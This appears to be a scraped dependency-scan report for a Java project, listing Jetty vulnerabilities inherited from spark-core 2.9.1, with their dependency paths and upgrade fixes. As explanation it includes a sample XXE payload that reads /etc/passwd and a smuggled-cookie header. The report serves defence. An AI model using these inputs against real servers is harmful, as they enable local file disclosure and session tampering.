Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-webapp@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
Overview
org.eclipse.jetty:jetty-server is a lightweight highly scalable java based web server and servlet engine.
Affected versions of this package are vulnerable to HTTP Request Smuggling. If GZIP request body inflation is enabled and requests from different clients are multiplexed onto a single connection, and if an attacker can send a request with a body that is received entirely but not consumed by the application, then a subsequent request on the same connection will see that body prepended to its body. The attacker will not see any data but may inject data into the body of the subsequent request.
Remediation
Upgrade org.eclipse.jetty:jetty-server to version 9.4.35.v20201120, 10.0.0.beta3, 11.0.0.beta3 or higher.
References
low severity
- Vulnerable module: org.eclipse.jetty:jetty-xml
- Introduced through: com.sparkjava:spark-core@2.9.1
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-webapp@9.4.18.v20190429 › org.eclipse.jetty:jetty-xml@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty.websocket:websocket-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-xml@9.4.18.v20190429
Overview
Affected versions of this package are vulnerable to XML External Entity (XXE) Injection via the XmlParser when parsing Jetty’s XML configuration files by importing a (remote) malicious WAR into Jetty’s server. Exploiting this vulnerability is possible when the WAR includes a malicious web.xml.
Note:
There are no circumstances in a normally deployed Jetty server where potentially hostile XML is given to the XmlParser class without the attacker already having arbitrary access to the server. I.e., in order to exploit XmlParser, the attacker would already have the ability to deploy and execute hostile code. Specifically, Jetty has no protection against a malicious web application, and potentially hostile web applications should only be run on isolated virtualization.
Thus this is not considered a vulnerability of the Jetty server itself, as any such usage of the Jetty XmlParser is equally vulnerable as direct usage of the JVM-supplied SAX parser. No CVE will be allocated to this advisory.
However, any direct usage of the XmlParser class by an application may be vulnerable. The impact would greatly depend on how the application uses XmlParser, but it could be a denial of service due to large entity expansion or possibly the revealing of local files if the XML results are accessible remotely.
Workaround
Users unable to upgrade to the fixed version should not use XmlParser to parse data from users.
Details
XXE Injection is a type of attack against an application that parses XML input. XML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.
Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.
For example, below is a sample XML document, containing an XML element- username.
<xml>
<?xml version="1.0" encoding="ISO-8859-1"?>
<username>John</username>
</xml>
An external XML entity - xxe, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of /etc/passwd and display it to the user rendered by username.
<xml>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<username>&xxe;</username>
</xml>
Other XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.
Remediation
Upgrade org.eclipse.jetty:jetty-xml to version 9.4.52.v20230823, 10.0.16, 11.0.16, 12.0.0 or higher.
References
low severity
- Vulnerable module: org.eclipse.jetty:jetty-server
- Introduced through: com.sparkjava:spark-core@2.9.1
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-server@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-webapp@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
Overview
org.eclipse.jetty:jetty-server is a lightweight highly scalable java based web server and servlet engine.
Affected versions of this package are vulnerable to Information Exposure. If an exception is thrown by the SessionListener#sessionDestroyed() method, the session ID will not be validated in the manager, which may allow the application to be left logged in on a shared computer.
Remediation
Upgrade org.eclipse.jetty:jetty-server to version 11.0.3, 10.0.3, 9.4.41 or higher.
References
low severity
- Vulnerable module: org.eclipse.jetty:jetty-client
- Introduced through: com.sparkjava:spark-core@2.9.1
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty.websocket:websocket-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-client@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
Overview
org.eclipse.jetty:jetty-client is an is an asynchronous http client module fro jetty server.
Affected versions of this package are vulnerable to Improper Input Validation due to improper URI paring in the HttpURI class.
Remediation
Upgrade org.eclipse.jetty:jetty-client to version 9.4.47, 10.0.10, 11.0.10 or higher.
References
low severity
- Vulnerable module: org.eclipse.jetty:jetty-http
- Introduced through: com.sparkjava:spark-core@2.9.1
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty.websocket:websocket-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-webapp@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429Remediation: Upgrade to com.sparkjava:spark-core@2.9.4.
…and 2 more
Overview
org.eclipse.jetty:jetty-http is an is a http module for jetty server.
Affected versions of this package are vulnerable to Improper Input Validation due to improper URI paring in the HttpURI class.
Remediation
Upgrade org.eclipse.jetty:jetty-http to version 9.4.47, 10.0.10, 11.0.10 or higher.
References
low severity
- Vulnerable module: org.eclipse.jetty:jetty-http
- Introduced through: com.sparkjava:spark-core@2.9.1
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty.websocket:websocket-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-client@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-webapp@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-http@9.4.18.v20190429
…and 2 more
Overview
org.eclipse.jetty:jetty-http is an is a http module for jetty server.
Affected versions of this package are vulnerable to Information Exposure such that nonstandard cookie parsing may allow an attacker to smuggle cookies within other cookies, or otherwise perform unintended behavior by tampering with the cookie parsing mechanism. If Jetty sees a cookie VALUE that starts with " (double quote), it will continue to read the cookie string until it sees a closing quote -- even if a semicolon is encountered.
Exploiting this vulnerability results in cookies exfiltration and policy based on cookies bypass.
Note:
A cookie header such as: DISPLAY_LANGUAGE="b; JSESSIONID=1337; c=d" will be parsed as one cookie, with the name DISPLAY_LANGUAGE and a value of b; JSESSIONID=1337; c=d instead of 3 separate cookies.
Remediation
Upgrade org.eclipse.jetty:jetty-http to version 9.4.51, 10.0.14, 11.0.14, 12.0.0.beta0 or higher.
References
low severity
- Vulnerable module: org.eclipse.jetty:jetty-server
- Introduced through: com.sparkjava:spark-core@2.9.1
Detailed paths
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-server@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty.websocket:websocket-server@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429
-
Introduced through: horeilly1101/deriv@horeilly1101/deriv#69c4e8395a404b5670754a705dd39239cc31098d › com.sparkjava:spark-core@2.9.1 › org.eclipse.jetty:jetty-webapp@9.4.18.v20190429 › org.eclipse.jetty:jetty-servlet@9.4.18.v20190429 › org.eclipse.jetty:jetty-security@9.4.18.v20190429 › org.eclipse.jetty:jetty-server@9.4.18.v20190429
Overview
org.eclipse.jetty:jetty-server is a lightweight highly scalable java based web server and servlet engine.
Affected versions of this package are vulnerable to Information Exposure such that nonstandard cookie parsing may allow an attacker to smuggle cookies within other cookies, or otherwise perform unintended behavior by tampering with the cookie parsing mechanism. If Jetty sees a cookie VALUE that starts with " (double quote), it will continue to read the cookie string until it sees a closing quote -- even if a semicolon is encountered.
Exploiting this vulnerability results in cookies exfiltration and policy based on cookies bypass.
Note:
A cookie header such as: DISPLAY_LANGUAGE="b; JSESSIONID=1337; c=d" will be parsed as one cookie, with the name DISPLAY_LANGUAGE and a value of b; JSESSIONID=1337; c=d instead of 3 separate cookies.
Remediation
Upgrade org.eclipse.jetty:jetty-server to version 9.4.51, 10.0.14, 11.0.14, 12.0.0.beta0 or higher.